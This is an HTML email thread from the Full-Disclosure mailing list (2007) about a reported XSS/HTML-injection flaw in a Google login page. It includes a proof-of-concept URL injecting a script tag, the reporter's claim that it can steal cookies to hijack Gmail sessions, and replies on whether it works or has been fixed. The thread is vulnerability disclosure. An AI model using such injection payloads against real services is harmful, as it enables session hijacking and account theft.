well this XSS can lead to so much data being stolen that it is not even funny!<br><br><div class="gmail_quote">On Nov 8, 2007 8:55 PM, Juergen Marester &lt;<a href="mailto:marester.juergen@gmail.com">marester.juergen@gmail.com
</a>&gt; wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"><div>wow ! 0day !</div>
<div>damn, right now 0day are fucking XSS ...<br><br>&nbsp;</div><div><div></div><div class="Wj3C7c">
<div><span class="gmail_quote">On 11/8/07, <b class="gmail_sendername">silky</b> &lt;<a href="mailto:michaelslists@gmail.com" target="_blank">michaelslists@gmail.com</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">worked for me minutes after it was posted. seems fixed now.<br><br>On 11/9/07, crazy frog crazy frog &lt;
<a href="mailto:i.m.crazy.frog@gmail.com" target="_blank">
i.m.crazy.frog@gmail.com</a>&gt; wrote:<br>&gt; i tested it on gmail latest version,itsnot working for me?<br>&gt;<br>&gt; On Nov 8, 2007 7:04 AM, Scripter Hack &lt;<a href="mailto:xss2root@gmail.com" target="_blank">xss2root@gmail.com
</a>
&gt; wrote:<br>&gt; &gt; There is a html injection vulnerability in <a href="https://www.google.com" target="_blank">https://www.google.com</a>.<br>&gt; &gt; It&nbsp;&nbsp;is very critical,you can get the cookie to login into gmail ore other
<br>&gt; &gt; service.
<br>&gt; &gt;<br>&gt; &gt; POC:<br>&gt; &gt; <a href="https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#" target="_blank">

https://www.google.com/accounts/ServiceLogin?service=mail&amp;rm=false&amp;continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&amp;ltmpl=default&amp;ltmplcache=2&amp;passive=truel#</a>&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;1-=1
<br>&gt; &gt;<br>&gt; &gt; More:<a href="http://xss2root.blogspot.com/" target="_blank">http://xss2root.blogspot.com/</a><br>&gt; &gt; _______________________________________________<br>&gt; &gt; Full-Disclosure - We believe in it.
<br>&gt; &gt; Charter: 
<a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>&gt; &gt; Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">
http://secunia.com/</a>
<br>&gt; &gt;<br>&gt;<br>&gt;<br>&gt;<br>&gt; --<br>&gt; advertise on secgeeks?<br>&gt; <a href="http://secgeeks.com/Advertising_on_Secgeeks.com" target="_blank">http://secgeeks.com/Advertising_on_Secgeeks.com</a><br>&gt; 
<a href="http://newskicks.com" target="_blank">
http://newskicks.com</a><br>&gt;<br>&gt; _______________________________________________<br>&gt; Full-Disclosure - We believe in it.<br>&gt; Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>&gt; Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br>&gt;<br><br><br>--<br>mike<br><a href="http://lets.coozi.com.au/" target="_blank">http://lets.coozi.com.au/
</a><br><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - 
<a href="http://secunia.com/" target="_blank">
http://secunia.com/</a><br></blockquote></div><br>
</div></div><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br>pdp (architect) | petko d. petkov<br><a href="http://www.gnucitizen.org">
http://www.gnucitizen.org</a>